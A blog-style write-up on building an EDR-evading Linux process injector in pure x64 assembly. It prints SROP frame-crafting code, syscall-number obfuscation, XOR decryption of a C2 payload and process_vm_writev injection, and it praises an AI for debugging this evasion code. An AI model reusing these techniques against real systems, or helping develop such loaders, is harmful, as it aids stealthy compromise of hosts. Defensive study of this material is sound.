Evasion Techniques in Pure x64 Assembly: SROP and Zero-Copy Injection

Research Context

When developing offensive security tools—specifically loaders and C2 agents—the biggest hurdle is always the noise you generate. Modern EDRs, Falco eBPF monitors, and kernel-level telemetry are incredibly adept at catching standard injection techniques. If you use standard ptrace routines (like PTRACE_POKEDATA) or rely on high-level C libraries (libc), you light up monitoring dashboards like a Christmas tree.

While architecting the Phantom-Evasion-Loader, a standalone x64 Advanced Process Injector, I wanted to drastically reduce this detection surface. The solution? Dropping libc entirely and writing pure x64 Assembly. But pure Assembly isn’t enough; you need the right execution flows.

In modern malware architecture, two techniques are heavily utilized to achieve this stealth: SROP (Sigreturn Oriented Programming) and Zero-Copy Injection via process_vm_writev. Here is how they work together, and the debugging hell required to implement them.

Context Hijacking: Why SROP?

Normally, when you invoke a syscall, EDRs hook the transition points to inspect what you are doing. SROP flips this dynamic.

SROP leverages rt_sigreturn (syscall 15 on x86-64). In a legitimate UNIX environment, when a signal handler finishes, rt_sigreturn is called to restore the CPU to its exact state before the signal was delivered. It does this by reading the signal frame that the kernel saved on the stack, including the sigcontext structure that holds the register values, and loading those values back into the CPU registers.

By artificially crafting a fake sigcontext frame on the stack and calling rt_sigreturn, we achieve arbitrary context hijacking.

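The Advantage: We hide the setup of the syscall we actually want to execute. Instead of sequentially setting up registers for a malicious call right before a syscall instruction, which is the pattern that gets flagged, we just format the stack. rt_sigreturn loads those values into the CPU, transitioning execution to our desired state with our desired syscall loaded into rax. The limit is worth stating: rt_sigreturn is itself a syscall, and the call that follows still enters the kernel, so anything tracing at the syscall boundary sees both. What shrinks is the footprint visible to static analysis and to heuristics keyed on register-setup patterns.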

Real-World SROP Trigger in Pure Assembly

To execute SROP, we must dynamically craft the sigcontext structure. In the snippet below from the Phantom engine, rbp acts as the base pointer for our fake frame. We set our target registers, calculate the rip for the next phase (x8_syscall), pivot the stack pointer (rsp), and call Syscall 15.

Notice how the next syscall (wait4, which is 61) is also slightly obfuscated (58 + 3) to avoid static opcode scanning for obvious syscall numbers.

; --- Real-World SROP Chain Example ---
; Dynamically building the sigcontext and jumping to the next phase

x7_syscall:
    syscall                     ; Execute previous syscall in the chain

    ; Crafting the fake sigcontext frame (rbp points to our frame base)
    mov qword [rbp + 0x68], 9   ; rsi = PTRACE_SINGLESTEP (Offset 0x68)
    mov qword [rbp + 0x88], 0   ; rax = 0
    mov qword [rbp + 0x38], 0   ; r8  = 0
    
    lea rax, [rel x8_syscall]   ; Calculate RIP for the next execution phase
    mov [rbp + 0xA8], rax       ; rip = x8_syscall (Offset 0xA8 in sigcontext)
    
    mov rsp, rbp                ; Align rsp to our crafted sigcontext frame
    mov rax, 15                 ; __NR_rt_sigreturn (Syscall 15)
    syscall                     ; Trigger SROP. Context is overwritten, execution jumps!

x8_syscall:
    ; We land here with our registers fully controlled by the SROP frame
    syscall                     

    ; Obfuscated Syscall Loading
    mov rax, 58                 
    add rax, 3                  ; rax = 61 (__NR_wait4)
    mov rdi, r13                ; rdi = target PID (preserved in r13)
    xor rsi, rsi                ; wstatus = NULL
    xor rdx, rdx                ; options = 0
    xor r10, r10                ; rusage = NULL
    syscall                     ; Execute wait4

The Silent Courier: process_vm_writev (Syscall 311)

Once you have control, you need to get your payload into the target process. This is where the Zero-Copy technique comes in using process_vm_writev (Syscall 311).

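Unlike a standard write path that copies data from user space into a kernel buffer and then out to the target's user space, process_vm_writev moves data directly from the local process's memory to the remote process's memory without staging it in kernel space. Strictly speaking this is a single copy rather than no copy; "zero-copy" here refers to the missing intermediate buffer.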

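The Disadvantage: It is strictly a memory write operation. It cannot allocate memory or change execution permissions on its own, and it is subject to the same permission check as attaching with ptrace.
The Advantage: It generates no PTRACE_POKEDATA requests, so monitoring keyed on those requests sees nothing. The call is still an ordinary syscall, so this is not invisibility: a monitor that watches process_vm_writev itself will see it. When chained properly, it lets you slide your shellcode into the target space with far less noise than word-by-word ptrace writes.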

While Syscall 311 can’t do the job alone, when paired with an SROP chain to handle the memory permissions and execution flow, it becomes a devastatingly quiet injection method.

Real-World Payload Decryption & Zero-Copy Injection

In a practical evasion scenario, the payload should stay encrypted at rest and sit in memory in plaintext for as short a time as possible. Below is the phase from the Phantom loader where the payload is decrypted in-memory (using a QWORD XOR key) immediately before being copied into the target process using process_vm_writev.

By structuring local_iov and remote_iov via relative addressing (rel), we keep the code Position Independent (PIC).

; =========================================================================
; PHASE 3: PAYLOAD DECRYPTION & INJECTION (The 'process_vm_writev' Way)
; =========================================================================

    ; 1. IN-MEMORY DECRYPTION
    ; Decrypt the payload within the loader's own memory space first.
    mov r12, 1632                   ; Payload size (example)
    lea r9, [rel c2_payload]
    mov r14, 0xACDAABBBA2BC1337     ; 8-Byte (QWORD) XOR Key

_decrypt_local_loop:
    mov r10, [r9]
    xor r10, r14                    ; Decrypt
    mov [r9], r10                   ; Write decrypted data back to Loader's memory
    
    add r9, 8
    sub r12, 8
    jg _decrypt_local_loop

    ; 2. ZERO-COPY INJECTION (process_vm_writev)
    
    lea rax, [rel c2_payload]
    mov [rel local_iov], rax        ; iov_base = local decrypted payload address
    mov qword [rel local_iov + 8], 1632 ; iov_len = Shellcode size

    mov rbx, qword [c2_address]     ; Remote address (previously allocated via mmap)
    mov [rel remote_iov], rbx       ; iov_base = Remote target address
    mov qword [rel remote_iov + 8], 1632 ; iov_len = Write size

    ; Fire Syscall 311!
    mov rax, 311                    ; sys_process_vm_writev
    mov rdi, r13                    ; Target PID
    lea rsi, [rel local_iov]        ; Local IOV struct address
    mov rdx, 1                      ; 1 local IOV
    lea r10, [rel remote_iov]       ; Remote IOV struct address
    mov r8, 1                       ; 1 remote IOV
    mov r9, 0                       ; Flags (0)
    syscall

Debugging Hell: Blood, Sweat, and Hidden Opcodes

Writing this logic in pure x64 Assembly is a punishing experience. You are not dealing with compiler warnings; you are dealing with segmentation faults that give you absolutely zero context.

During the debugging phase of the Phantom loader, I lost hours to what I call “invisible opcode” syndrome. Because you are manually aligning the stack for the sigcontext structure, a single misaligned byte or an easily overlooked opcode can cause the kernel to reject the sigreturn or corrupt the execution flow.

I had instances where perfectly logical code would result in a crucial register getting clobbered by an off-by-one error right before the syscall. Human eyes start to glaze over after looking at hex dumps and GDB traces for 8 hours straight.

A Quick Shoutout: I have to give credit where it’s due. When my eyes were bleeding from staring at register states and stack alignments, I fed the raw opcode traces and GDB outputs into Google’s Gemini. It acted as a reliable second set of eyes, quickly spotting the microscopic register clashes and opcode misalignments that were burying the payload. If you are doing pure Assembly exploitation, having an AI comb through your opcode offsets is a game-changer.

Conclusion and Open Source

Implementing SROP and Zero-Copy injection in pure, libc-free Assembly is not for the faint of heart. It requires a masochistic love for low-level architecture. However, the resulting stealth makes it highly applicable for testing the resilience of modern eBPF and EDR solutions.

You can examine the full source code, the XOR-decryption logic, and the SROP implementation on my GitHub.

Project: Phantom-Evasion-Loader (Standalone x64)

Disclaimer: This research and the associated source code are intended strictly for educational purposes, authorized security auditing, and developing better defensive heuristics.
